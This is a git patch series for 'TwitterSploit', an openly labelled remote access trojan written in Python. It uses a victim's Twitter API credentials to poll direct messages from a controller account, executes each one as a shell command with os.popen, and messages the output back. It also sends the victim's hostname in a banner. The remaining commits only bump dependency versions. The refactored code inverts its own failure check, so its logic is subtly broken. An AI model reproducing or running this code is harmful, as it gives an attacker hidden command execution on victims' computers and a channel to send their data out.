From 195ce654b5a2f05918cc2ff0e5e1c5fb57776e14 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Sun, 5 Aug 2018 13:49:59 -0400 Subject: [PATCH 1/5] PEP8 and requirements.txt --- .gitignore | 3 ++ README.md | 4 +- requirements.txt | 10 +++++ TwitterSploit.py => twitter_sploit.py | 54 ++++++++++++++++----------- 4 files changed, 49 insertions(+), 22 deletions(-) create mode 100644 .gitignore create mode 100644 requirements.txt rename TwitterSploit.py => twitter_sploit.py (62%) diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..18fa2a3 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +*.pyc +venv/ +__pycache__/ diff --git a/README.md b/README.md index 44a7f1b..ed762ae 100644 --- a/README.md +++ b/README.md @@ -1 +1,3 @@ -See SocioSploit for documentation. +# TwitterSploit + +See [SocioSploit](https://www.sociosploit.com/twitter-remote-access-trojan-twittersploit.html) for documentation. diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..1d1a24b --- /dev/null +++ b/requirements.txt @@ -0,0 +1,10 @@ +certifi==2018.4.16 +chardet==3.0.4 +idna==2.7 +oauthlib==2.1.0 +PySocks==1.6.8 +requests==2.19.1 +requests-oauthlib==1.0.0 +six==1.11.0 +tweepy==3.6.0 +urllib3==1.23 diff --git a/TwitterSploit.py b/twitter_sploit.py similarity index 62% rename from TwitterSploit.py rename to twitter_sploit.py index c065465..32073b1 100755 --- a/TwitterSploit.py +++ b/twitter_sploit.py @@ -1,8 +1,9 @@ -import tweepy -import re import os +import re import time +import tweepy + ## Complete API Parameters before use -- configured for victim user ## consumer_key = '' consumer_secret = '' @@ -12,26 +13,35 @@ ## Complete info on user account ## c2_usr = '' +# Twitter auth auth = tweepy.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_token_secret) api = tweepy.API(auth) userid = re.findall(r'(?<=u\'id\': )[0-9]+', str(api.get_user(c2_usr)))[0] +# Constant strings +CONNECTION_ESTABLISHED = "[+] Twitter RAT connection established...\n" +SOMETHING_WENT_WRONG = "[-] Something went wrong...\n" +COMMAND_RECIEVED = '[+] Command Recieved - ' +COMMAND_FAILED = '[-] ERROR - COMMAND FAILED' +COMMAND_SENDING = '[+] Sending Result - \n' + + def get_command(api, lastcommand): raw_dms = api.direct_messages() - dms = re.findall(r'(?<=sender_id_str=u\''+userid+'\\\', text=u\')[^\']+', str(raw_dms)) + dms = re.findall(r'(?<=sender_id_str=u\'' + userid + + '\\\', text=u\')[^\']+', str(raw_dms)) if dms[0] != lastcommand: return dms[0] - else: - return None + return + def write_message(api, message): - api.send_direct_message(screen_name=c2_usr, text=message) + return api.send_direct_message(screen_name=c2_usr, text=message) + -last_command = None -last_command = get_command(api, last_command) -hostname = str(os.popen('hostname').read()).replace('\n','') -splash = ''' +HOSTNAME = str(os.popen('hostname').read()).replace('\n', '') +SPLASH = ''' ===================================== ==.................................== ==..........TWITTER RAT............== @@ -53,27 +63,29 @@ def write_message(api, message): _________________$$$$$$$$$$$$$$$$____ _______________$$$$$______$$$$$$$$___ _________$$$$$$$$$____________$$$$$$_ -''' % (hostname) +''' % (HOSTNAME) + try: - write_message(api, splash) - print "[+] Twitter RAT connection established...\n" + write_message(api, SPLASH) + print(CONNECTION_ESTABLISHED) except: - print "[-] Something went wrong...\n" - exit + print(SOMETHING_WENT_WRONG) + exit(1) + +last_command = get_command(api, None) while True: command = get_command(api, last_command) if command: - print '[+] Command Recieved - ' + command + print(COMMAND_RECIEVED + command) time.sleep(2) last_command = command try: result = os.popen(command).read() - if result == '': - result = '[-] ERROR - COMMAND FAILED' + if result: + result = COMMAND_FAILED except: - result = '[-] ERROR - COMMAND FAILED' - print '[-] ERROR - COMMAND FAILED' - print '[+] Sending Result - \n' + result + result = COMMAND_FAILED + print(COMMAND_SENDING + result) write_message(api, result) time.sleep(1) From 5badeeb9134a4ae0d2820a866f0373c59f23f4d6 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sun, 25 Oct 2020 15:54:23 +0000 Subject: [PATCH 2/5] Bump urllib3 from 1.23 to 1.24.2 Bumps [urllib3](https://github.com/urllib3/urllib3) from 1.23 to 1.24.2. - [Release notes](https://github.com/urllib3/urllib3/releases) - [Changelog](https://github.com/urllib3/urllib3/blob/master/CHANGES.rst) - [Commits](https://github.com/urllib3/urllib3/compare/1.23...1.24.2) Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 1d1a24b..ec22de6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,4 +7,4 @@ requests==2.19.1 requests-oauthlib==1.0.0 six==1.11.0 tweepy==3.6.0 -urllib3==1.23 +urllib3==1.24.2 From 4c49761005df98693e2cad03a1d6ea9b7a511101 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sun, 25 Oct 2020 15:54:33 +0000 Subject: [PATCH 3/5] Bump requests from 2.19.1 to 2.20.0 Bumps [requests](https://github.com/psf/requests) from 2.19.1 to 2.20.0. - [Release notes](https://github.com/psf/requests/releases) - [Changelog](https://github.com/psf/requests/blob/master/HISTORY.md) - [Commits](https://github.com/psf/requests/compare/v2.19.1...v2.20.0) Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 1d1a24b..af0eef2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -3,7 +3,7 @@ chardet==3.0.4 idna==2.7 oauthlib==2.1.0 PySocks==1.6.8 -requests==2.19.1 +requests==2.20.0 requests-oauthlib==1.0.0 six==1.11.0 tweepy==3.6.0 From 9a92095265cf8d5188f46434cebfe81a6326ce4d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 2 Jun 2021 03:17:57 +0000 Subject: [PATCH 4/5] Bump urllib3 from 1.24.2 to 1.26.5 Bumps [urllib3](https://github.com/urllib3/urllib3) from 1.24.2 to 1.26.5. - [Release notes](https://github.com/urllib3/urllib3/releases) - [Changelog](https://github.com/urllib3/urllib3/blob/main/CHANGES.rst) - [Commits](https://github.com/urllib3/urllib3/compare/1.24.2...1.26.5) --- updated-dependencies: - dependency-name: urllib3 dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f108de5..cc9bec6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,4 +7,4 @@ requests==2.20.0 requests-oauthlib==1.0.0 six==1.11.0 tweepy==3.6.0 -urllib3==1.24.2 +urllib3==1.26.5 From 3e728df7b1a5eab599b084ca6d76cf3b9f279c5c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 8 Dec 2022 02:40:59 +0000 Subject: [PATCH 5/5] Bump certifi from 2018.4.16 to 2022.12.7 Bumps [certifi](https://github.com/certifi/python-certifi) from 2018.4.16 to 2022.12.7. - [Release notes](https://github.com/certifi/python-certifi/releases) - [Commits](https://github.com/certifi/python-certifi/compare/2018.04.16...2022.12.07) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index cc9bec6..421ebf2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -certifi==2018.4.16 +certifi==2022.12.7 chardet==3.0.4 idna==2.7 oauthlib==2.1.0